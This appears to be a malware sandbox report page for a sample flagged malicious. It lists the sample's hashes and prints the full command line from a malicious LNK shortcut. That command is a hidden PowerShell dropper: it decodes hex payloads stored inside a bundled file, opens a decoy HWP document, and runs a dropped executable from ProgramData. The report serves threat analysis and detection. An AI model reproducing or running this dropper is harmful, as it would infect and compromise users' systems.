Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
4b945d82d21f35dd0f8c07568f47c4cf
Sha1
a57bccb6fc51186d0b6465ac9b469ddb5ff8c9bd
Sha256
45acb82fa97c31ad41ae49c99ac8720afd7c11d9f9936dca3762be37497dc967
Sha384
97b27703e2728e97aebeee435d58f4fa2f47f5c69fefe13f23851bc3a95cf4ba843008c5c09fcb708cc379685c40ff1d
Sha512
f8edae5844d381e742f5e1f4d223f564e0ff2996889e83acb6a715add67efaecba5c1a35873719e88ccdbb6afadee36f9d634ff0bd48e3e140d38c573e8ffe2e
SSDeep
12288:aZf3TpTxEeYAiKQ94Ll4xatV0oLWCq9ASr11k+ZOFe6DwAAdkabJtCoMwooxb/:2/Qvt4LlM1Ohw2coe6HAOabTCTwH
TLSH
F3D4232375F9090F73F10198EB0D2941045FA18F5A2BF164A1FDADD1A8736B18EFEA52
File Structure
4b945d82d21f35dd0f8c07568f47c4cf
Malicious
file_0.bin
Malicious
LNK CommandLine
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$loc=Get-Location;$paths=@($env:TEMP,$loc);$sz=2116116;$f=Get-ChildItem -Path $paths -Recurse *.* -File -ErrorAction SilentlyContinue | Where-Object{$_.Length-eq $sz} | Select-Object -First 1 -Expand FullName;$raw=[IO.File]::ReadAllBytes($f);$t=[Text.Encoding]::ASCII.GetString($raw);$a=$t.IndexOf('NCFO');$b=$t.IndexOf('BCFO');$c=$t.IndexOf('SCFO');$d=$t.IndexOf('KCFO');$x=$t.Substring($a+4,$b-$a-4);$y=$t.Substring($b+4,$c-$b-4);$z=$t.Substring($c+4,$d-$c-4);function HX($s){$buf=New-Object byte[] ($s.Length/2);for($i=0;$i-lt$buf.Length;$i++){$buf[$i]=[Convert]::ToByte($s.Substring($i*2,2),16)}return $buf}[IO.File]::WriteAllBytes('c:\users\public\attach.hwp',(HX $x));Start-Process 'c:\users\public\attach.hwp';[IO.File]::WriteAllBytes('c:\programdata\heidi.db',(HX $y));[IO.File]::WriteAllBytes('c:\programdata\heidisqls.exe',(HX $z));c:\programdata\heidisqls.exe c:\programdata\heidi.db"
4b945d82d21f35dd0f8c07568f47c4cf (655.99 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙